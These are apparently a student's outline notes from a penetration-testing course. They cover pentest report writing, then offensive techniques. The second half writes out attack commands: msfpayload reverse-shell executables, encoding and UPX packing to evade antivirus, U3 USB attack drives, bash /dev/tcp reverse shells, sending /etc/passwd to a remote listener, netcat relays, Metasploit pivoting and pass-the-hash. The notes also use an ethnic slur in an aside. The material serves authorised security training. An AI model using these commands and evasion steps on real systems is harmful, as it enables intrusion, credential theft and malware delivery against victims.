- 561
- 561: Maximizing the effectiveness of Reports, Exploits, and Command Shells
- (back to top)

- Intro
- in 560, everything works
- in 561, more experimental
- new to Metaploit framework
- may not work 100%
- report writing workshop
- Reports
- exec summary
- systematic failure
- patch process failing?
- systems not following build procedures?
- focus on business aspects
- how to remedy with mgt action?
- enough detail to support mgt decisions
- context of risk, now technology
- contents
- a little about scope
- narrative
- how measured
- findings
- why important?
- what is the risk?
- each finding is an argument for action
- description of tool or setting, "not needed for business purposes", why risky, recommendation
- solution at end
- self-contained
- detail section
- spell out your acronyms
- sound sarcastic
- talking over audience's heads
- first use in each ection should be spelled out because report may be sliced up
- assume audientce is technical, but not pentestes themselves
- balance between too technical and too basic
- problem: criticize example report
- exec summary
- using tech terms
- subnets: what does that mean in relation to the scope?
- says nothing of systematic issues. All solutions are point solutions
- "focused on servers and their related systems"
- no nararrative about how PII was accessed
- sounds cranky, no positive recommendations
- what efforts are successful and should be continued
- how pervasive were the flaws found? what do the existence of the flaws indicate systemically?
- no indication of which one is most serious
- missing
- 1. restrict services to those that serve a business pupose
- 2. improve patching process
- introduction
- fuzzy definition of subnets tested
- how were internal networks tested via Internet
- turns out to be an artifact of the class avoiding the 837-5309 problem
- scope and dates should have been separate section
- DoS mentioned twice. Why?
- Second time, tester is compaining about test not being allowed.
- methodology
- all general statements, not anything about what was done
- no mention of what tools were used
- how can we retest in the same manner to confirm remediation was successful?
- no mention of techniques, just tools
- harping on DoS tests not being performed again
- findings
- high, med, low risk is only measure
- no mention of what tools were used
- how hard to fix?
- how much does each finding impact the business? That is the correct measure of risk.
- each risk category should be it's own section
- 4.1.1
- what is GUI? what is VNC?
- summary does not say what the problem is
- did they exploit VNC, or just find it listening?
- if it had been exploited, what could an attacker have done?
- keep going, access other systems,etc.
- 4.1.2
- 4.1.3
- Apply Windows Patch
- cut and paste info
- 4.2.1
- got some access, could not get further, hence only "medium"
- should have been "high" because someone with more time could have gotten in
- no mention that patching process is failure
- 4.2.2
- what is an "excessive port"?
- recommend
- write to target audience
- convey a message that has a real impact
- hire a tech writer
- better reports trump better technical prowess
- Metasploit
- Title: Building, encoding, and Using Metaploit payloads
- goals
- steps
- 1. build evil exe
- msfpayload
- takes a payload and makes one of:
- X - standalone exe
- C - C code
- P - Perl
- J - .js to download and execute
- R - generate raw bytes
- vbscript (for office macros)
- Office doc compromises a machine as soon as opened
- ./msfpayload windows/shell_reverse_tcp LPORT=3333.... X > filename.exe
- Check the length. If under 100 bytes, probably did not work
- Choice or port affects detection by AV engines.
- 55555, 66666, etc. more detectable
- try at virustotal
- as soon as executed
- reverse shell (to our nc listener)
- but may crash
- 1 in 10 WIndows systems more likely to crash
- Why reverse shell?
- more likely to be allowed outbound by firewall than inbound bind_tcp shell
- use a port like 80 or 443
- phones home, no need for attacker to know the victim IP
- Any metaploit payload?
- fancier payloads tend to be buggy
- shell is enough anyway
- shell_bind_tcp
- shell_reverse_tcp
dark operator- carlos perez
- most AV only look at first 150 bytes
- padding helps avoid AV detection
- 2. encode evil exe
- msfencode
- encode the payload
- many IDS detect payload, not exploit
- see slide 14
- show encoders
- set ENCODER [type]
- ./msfencode -l -a x86
- to list possibilities
- -a [processor]
- x86
- x/86/shikata_ga_nai
- after WW2, we thought Japs would fight until the end
- but Jap populace decided "we've lost, there's nothing more that can be done"
- output
mark baggett- articles, modify Ruby code to make encoding more stable
see his blog- g mark baggett metasploit
- 3 rounds of encoding, and still runs
- slide 17 ff. has the steps to encode
- encoded payload can be reused in msf
- 3. further alter exe
- upx packer
- easier way to dodge detection
- also used by legit developers to protect their intell. proprety
- some AV detect, some do not
- can pack an .exe
- can even pack a .dll
- instructor's favories> -2 -7
- upx.exe -force -o exename.exe inputexe.exe
- -force because UPX is whiny
- 4. weaponize exe
- universal customizer and USB token
exercise: create attack USB thumbdrive- start slide 33
- also create an attack ipod touch: more likely for exec to hook it up
- must be a U3 device
- behave like a CDROM
- can field strip, put in a non-U3 device case (!)
- policy
- will never insert a U3 device
- install universalcustomizer
- creates U3custom.iso in its BIN folder
Lunch break
- search
- pivot
- psexec
- pass-the-hash
- Post-exploitation without netcat
- netcat is not always installed or available
- What do you do?
- Mike Poor: easy, get nc and put it there
- Uses for netcat
- connect to arbitrary open ports
- scan ports
- wrap the above in scripts
- send files
- implement backdoor shell
- build relays
- more
- versions
original by Hobbit
Dan Kaminsky- arbitrary frame injection
by Atlas- currently still a work in progress
- Why not just netcat?
- not installed
- Rules of Engagement prohibit installation of tools
- HIPS prevents it
- AV tools blocking nc
- maybe we don't even need it
- best practices
- install no tools, use built-in
- if it crashes system, no flack
- not detected by AV
- safer
- goals
- backdoor shell
- file transfer
- port scanner
- our parameters
- Focus on TCP not UDP
- easier
- more built in tools
- Use arbitrary ports
- Linux first
- Linux
- /dev/tcp
- don't need root to use it
- /dev/tcp/[ip]/[port]
- not on Debian distros
- no /dev/tcp
- only Fedora, Red Hat has it
- file xfer
- cat /etc/passwd > /dev/tcp/
- catch with nc listener
- command line backdoor
- /dev/tcp
- /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1
- ampersands before 1s because listed more than once
- also can redir into sclient and send to remote SSH listeneer
- "reverse telnet"
- if debian, for instance
- 2 outgoing telnets!
- victim$ telnet [attackerIP] {port1 | /bin/bash | telnet [attackerIPaddr] [port2]
- attacker$ nc -l -p 2222
- attacker$ nc -l -p 3333
- portscan
- /dev/tcp
- echo > /dev/tcp/[IP]/[port]
- see if "connection refused". If so, port is closed
- If port open, no error
- because Linux systems don't brag
- exit status = 0
- port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IP]/$port;
[ $? == 0 ] && echo $port "is open >> /tmp/ports.txt; port=`expr $port + 1'; done
- telnet
- Windows
- building blocks
- for /L %i (start, step, stop) do [command]
- a counter
- %i will never reach stop
- telnet
- hideous
- hangs on an open port
- no errorlevel
- no logging
- not installed on Vista (by default)
- pkgmgr /iu: "TelnetClient"
- or install telnet server with /uu instead of /iu
- ftp
- open [ip] [port]
- ftp can read from a response file with -s
- portscanner
- for /L %i in (1,1,1024) do echo open [IP] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
- hangs for 15 seconds on open port, then moves on
- actually, good: this is stealthy and may fool IDS
- does not store results
- ugly workround to store results: see slide 29
- file xfer
- type file >> \\machine\share\filename
- Use net use session to mount remote drive if credentials needed
- use copy or move also
- echo hello >> \\\temp\file.txt
- command shell
- the "file shell" backdoor
- "for" command with '^' as delimiter
- see slide
- it loops every second; if no commands.txt it loops again
- ping command to slow it down
- feed it commands to write to commands.txt
- read results by using type to read output.txt
- Samba works great for the two above functions
- other ways
- use FTP to transfer files back and forth
- retrieve command as PTR record, etc.
- then return result as an A record lookup
exercise slide 36- note: NTLMv1 must be enabled on Windows for Samba to work
- Additional Metasploit features
- additional handout, page numbering starts with 4-1
- often system we are trying to access is not the one weh just exploited, but one a few hops away
- Metasploit 3.1 search command
- all
- specific service
- payloads
- exploits
- Route command
- compromizing a system
- pretend that we are at victim1
- set RHOST victim2
- exploit
- not msf will automatically laugh the exploit from victim1
- exploit victim1
- use exploit
- set RHOST victim1IP
- exploit
- crtl-Z to bg the meterpreter session
- exploit victim2 via victim1
- route add victim2subnet netmask session#
- route print
- set RHOST victim2IP
- exploit
- traffic goes from victim1 to victim2
- psexec to launch
- as if on victim1 (again)
- see slide 4-7
- but we don't have admin necessarily
- integrated pass-the-hash
- do meterpreter's hashdump on victim1
- use windows/smb/psexec
- set SMBPass adminLMhash:adminNThash
- set SMBUser Administrator
- exploit
- slide 4-8
- problem: psexec is multithreaded, meterpreter is not
- so only stable for 30 seconds
exercise slide 4-10- exploit
- meterpreter as payload
- route command for
- pivot to
- tcpdump on would only show traffic from; none from you!
- Flexible Linux pivots
- metasploit route might crash too much
- very common:
- compromise system on DMZ
- get shell on that system
- use netcat relay
- firewall blocks port 445 dst on DMZ
- netcat gender bender relay
- start from our Windows system
- cannot attck DMZ WIndows usinf fgdump thru firewall
- our Linux system
- our system, listen on 445, nc to port 80 on DMZ victim1
- mknod backpipe1
- nc -nvlp 445 0<backpipe1 | nc -nvlp 80 | tee backpipe1
- or
- nc -nvlp 445 0<backpipe1 | nc -nvlp 80 > backpipe1
- DMZ Linux system
- mknod backpipe2
- connect to DMZ Windows system on 445
- nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 | tee backpipe2
- or
- nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 > backpipe2
- Quickly!
- run fgdump through our system through DMZ L to DMZ W
- or net use
- net use * \\ourLinux\c$ password /u:Administrator
- must be done fast, as once DMZ-L connects to DMZ-W on 445, DMZ_W will not wait long for an SMB connection.